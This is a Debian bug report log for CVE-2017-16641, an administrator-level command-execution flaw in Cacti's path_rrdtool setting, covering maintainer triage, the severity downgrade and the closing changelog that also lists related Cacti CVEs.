Debian Bug report logs -
#881110
cacti: CVE-2017-16641: arbitrary execution of os commands via path_rrdtool parameter in an action=save request
Reported by: Salvatore Bonaccorso <carnil@debian.org>
Date: Tue, 7 Nov 2017 21:21:05 UTC
Severity: important
Tags: fixed-upstream, patch, security, upstream
Found in versions cacti/0.8.8a+dfsg-5+deb7u10, cacti/0.8.8a+dfsg-5, cacti/1.1.27+ds1-2
Fixed in version cacti/1.1.27+ds1-3
Done: Paul Gevers <elbrus@debian.org>
Bug is archived. No further changes may be made.
Forwarded to https://github.com/Cacti/cacti/issues/1057
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
:
Bug#881110
; Package src:cacti
.
(Tue, 07 Nov 2017 21:21:07 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>
:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
.
(Tue, 07 Nov 2017 21:21:07 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Source: cacti
Version: 1.1.27+ds1-2
Severity: grave
Tags: patch security upstream
Forwarded: https://github.com/Cacti/cacti/issues/1057
Hi,
the following vulnerability was published for cacti.
CVE-2017-16641[0]:
| lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators
| to execute arbitrary OS commands via the path_rrdtool parameter in an
| action=save request to settings.php.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2017-16641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16641
[1] https://github.com/Cacti/cacti/issues/1057
Please adjust the affected versions in the BTS as needed, only did
check unstable's version for now source-wise.
Regards,
Salvatore
Information forwarded
to debian-bugs-dist@lists.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
:
Bug#881110
; Package src:cacti
.
(Fri, 10 Nov 2017 18:51:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Paul Gevers <elbrus@debian.org>
:
Extra info received and forwarded to list. Copy sent to Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
.
(Fri, 10 Nov 2017 18:51:03 GMT) (full text, mbox, link).
Message #10 received at 881110@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Control: found 881110 0.8.8a+dfsg-5+deb7u10
On 07-11-17 22:17, Salvatore Bonaccorso wrote:
> Please adjust the affected versions in the BTS as needed, only did
> check unstable's version for now source-wise.
All versions in Debian are affected.
Unfortunately the upstream commit contains much unneeded changes to fix
the issue. Additionally for pre-buster fixes, the code in settings.php
is seriously different.
Paul
[signature.asc (application/pgp-signature, attachment)]
Marked as found in versions cacti/0.8.8a+dfsg-5+deb7u10.
Request was from Paul Gevers <elbrus@debian.org>
to 881110-submit@bugs.debian.org
.
(Fri, 10 Nov 2017 18:51:03 GMT) (full text, mbox, link).
Marked as found in versions cacti/0.8.8a+dfsg-5.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org
.
(Fri, 10 Nov 2017 19:33:03 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
:
Bug#881110
; Package src:cacti
.
(Fri, 10 Nov 2017 20:30:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Paul Gevers <elbrus@debian.org>
:
Extra info received and forwarded to list. Copy sent to Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
.
(Fri, 10 Nov 2017 20:30:06 GMT) (full text, mbox, link).
Message #19 received at 881110@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Control: severity -1 important
Control: tags -1 pending
Hi all,
On 07-11-17 22:17, Salvatore Bonaccorso wrote:
> Severity: grave
> CVE-2017-16641[0]:
> | lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators
> | to execute arbitrary OS commands via the path_rrdtool parameter in an
> | action=save request to settings.php.
Although this is true, and this parameter is not meant to be used like
this, the cacti *admin* has always had this possibility via the "Data
Input Method" freedom, which caused CVE-2009-4112 / bug 561339 to be
raised. I just confirmed that I could indeed still do the via that
(trivial) route.
So just to be clear (and I don't particularly like it), the power of the
cacti *admin* has been long known and has been accepted as unfixed for
multiple Debian releases. Therefor I lower the severity of this bug.
Unfortunately the upstream patch for this bug does not simply apply to
pre 1.x versions of cacti. I am not comfortable (yet) with creating a
patch for those versions, and due to CVE-2009-4112, I don't think it is
worth fixing this in stable and older.
Paul
PS on other option is to raise the severity of 561339 again, but I don't
expect the patch to then miraculously turn up.
[signature.asc (application/pgp-signature, attachment)]
Severity set to 'important' from 'grave'
Request was from Paul Gevers <elbrus@debian.org>
to 881110-submit@bugs.debian.org
.
(Fri, 10 Nov 2017 20:30:06 GMT) (full text, mbox, link).
Added tag(s) pending.
Request was from Paul Gevers <elbrus@debian.org>
to 881110-submit@bugs.debian.org
.
(Fri, 10 Nov 2017 20:30:06 GMT) (full text, mbox, link).
Added tag(s) fixed-upstream.
Request was from bts-link-upstream@lists.alioth.debian.org
to control@bugs.debian.org
.
(Mon, 13 Nov 2017 17:36:32 GMT) (full text, mbox, link).
Reply sent
to Paul Gevers <elbrus@debian.org>
:
You have taken responsibility.
(Tue, 14 Nov 2017 20:51:06 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>
:
Bug acknowledged by developer.
(Tue, 14 Nov 2017 20:51:06 GMT) (full text, mbox, link).
Message #30 received at 881110-close@bugs.debian.org (full text, mbox, reply):
Source: cacti
Source-Version: 1.1.27+ds1-3
We believe that the bug you reported is fixed in the latest version of
cacti, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 881110@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Paul Gevers <elbrus@debian.org> (supplier of updated cacti package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Tue, 14 Nov 2017 20:14:34 +0100
Source: cacti
Binary: cacti
Architecture: source
Version: 1.1.27+ds1-3
Distribution: unstable
Urgency: medium
Maintainer: Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
Changed-By: Paul Gevers <elbrus@debian.org>
Description:
cacti - web interface for graphing of monitoring systems
Closes: 881110
Changes:
cacti (1.1.27+ds1-3) unstable; urgency=medium
.
* CVE-2017-16641: remote authenticated administrators can execute
arbitrary os commands via the path_rrdtool parameter in an action=save
request to settings.php (Closes: #881110)
* CVE-2017-16660: remote authenticated administrators can conduct Remote
Code Execution attacks by placing the Log Path under the web root, and
then making a remote_agent.php request containing PHP code in a
Client-ip header
* CVE-2017-16661: remote authenticated administrators can read arbitrary
files accessible by the web-server user by placing the Log Path into a
private directory, and then making a clog.php?filename= request
* CVE-2017-16785: reflected XSS via the PATH_INFO to host.php
(reintroduction of CVE-2017-15194)
* Bump standards to 4.1.1
* Set Priority to optional
Checksums-Sha1:
6da0c05e6b24552f8e3f4c0d995152531237f5e1 2134 cacti_1.1.27+ds1-3.dsc
e0d1f509fb465f2c1676b254fc0d5b1362e9f7f5 56092 cacti_1.1.27+ds1-3.debian.tar.xz
Checksums-Sha256:
9d77784c2545398d29f325c99764b1aebeb8966bb7d12e5c0dda78e7673306f3 2134 cacti_1.1.27+ds1-3.dsc
519db95eb5fd254f309faad31aaeb2d79fa1b2bbe8a8c604aa8b8fdcc7203f44 56092 cacti_1.1.27+ds1-3.debian.tar.xz
Files:
2f7335b2759d8227a2b170074abf98de 2134 web optional cacti_1.1.27+ds1-3.dsc
fd6375c1fc789d1654364421b949f5ac 56092 web optional cacti_1.1.27+ds1-3.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
iQEzBAEBCAAdFiEEWLZtSHNr6TsFLeZynFyZ6wW9dQoFAloLTQwACgkQnFyZ6wW9
dQpdEQgArlYK+cTh43PDHWpBbVGsg2TSH6vkIPQXUbM10uTcKHvgbd+vF83tYoh4
PQ+KHUImJhDc0Kd6bVfk9TixKG0KAm3FQ4sMleNCtQugoDKeR1qPadEbXlZB1GNp
AqgAUvYfWWPF1u4bi/ZCB+WJULOeiU8J2WNCa64ppbSUpQLy2JD9kHaRuypYw3YQ
8KkC0eY7dTsaDzpjkQOYjZLXKiivvTRDh4oUYJ88mPJDcXIziC2a6in4lWUcQyho
/fker79akY1cL6KDKoOdff8iq86V1h9WD9aLWetZu/SEw96ysWHHvu0fmM9IJmHa
uEs97E9RHMxHHnsik8P970Z1cxUwag==
=x3y5
-----END PGP SIGNATURE-----
Information forwarded
to debian-bugs-dist@lists.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
:
Bug#881110
; Package src:cacti
.
(Mon, 20 Nov 2017 20:33:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>
:
Extra info received and forwarded to list. Copy sent to Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
.
(Mon, 20 Nov 2017 20:33:03 GMT) (full text, mbox, link).
Message #35 received at 881110@bugs.debian.org (full text, mbox, reply):
Hi Paul,
Sorry for the delayed reply.
On Fri, Nov 10, 2017 at 09:26:17PM +0100, Paul Gevers wrote:
> Control: severity -1 important
> Control: tags -1 pending
>
> Hi all,
>
> On 07-11-17 22:17, Salvatore Bonaccorso wrote:
> > Severity: grave
> > CVE-2017-16641[0]:
> > | lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators
> > | to execute arbitrary OS commands via the path_rrdtool parameter in an
> > | action=save request to settings.php.
>
> Although this is true, and this parameter is not meant to be used like
> this, the cacti *admin* has always had this possibility via the "Data
> Input Method" freedom, which caused CVE-2009-4112 / bug 561339 to be
> raised. I just confirmed that I could indeed still do the via that
> (trivial) route.
>
> So just to be clear (and I don't particularly like it), the power of the
> cacti *admin* has been long known and has been accepted as unfixed for
> multiple Debian releases. Therefor I lower the severity of this bug.
>
> Unfortunately the upstream patch for this bug does not simply apply to
> pre 1.x versions of cacti. I am not comfortable (yet) with creating a
> patch for those versions, and due to CVE-2009-4112, I don't think it is
> worth fixing this in stable and older.
Ok! Your arguing makes sense to me, and I went ahead to mark the
issue as no-dsa for stretch and jessie. Still if upstream provides
help in adressing any of those two issues would be great to se fixes
at some point e.g. via a point release or picked up in a DSA as well.
Regards,
Salvatore
Information forwarded
to debian-bugs-dist@lists.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
:
Bug#881110
; Package src:cacti
.
(Mon, 20 Nov 2017 21:12:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Paul Gevers <elbrus@debian.org>
:
Extra info received and forwarded to list. Copy sent to Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
.
(Mon, 20 Nov 2017 21:12:03 GMT) (full text, mbox, link).
Message #40 received at 881110@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Hi Salvatore,
On 20-11-17 21:30, Salvatore Bonaccorso wrote:
> Sorry for the delayed reply.
NP.
> Ok! Your arguing makes sense to me, and I went ahead to mark the
> issue as no-dsa for stretch and jessie.
Thanks.
> Still if upstream provides
> help in adressing any of those two issues would be great to se fixes
> at some point e.g. via a point release or picked up in a DSA as well.
Sure, will do. I am hoping that upstream will provide a patch for
CVE-2009-4112 in a reasonable time from now. Upstream has really stepped
up since the preparation of 1.x started and they were getting closer to
actually releasing it. If/once that happens, I'll make sure I'll
backport both that patch and the one for this issue, but then it is
worth the effort in my opinion.
Paul
[signature.asc (application/pgp-signature, attachment)]
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org
.
(Tue, 03 Apr 2018 07:26:21 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 18:48:02 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.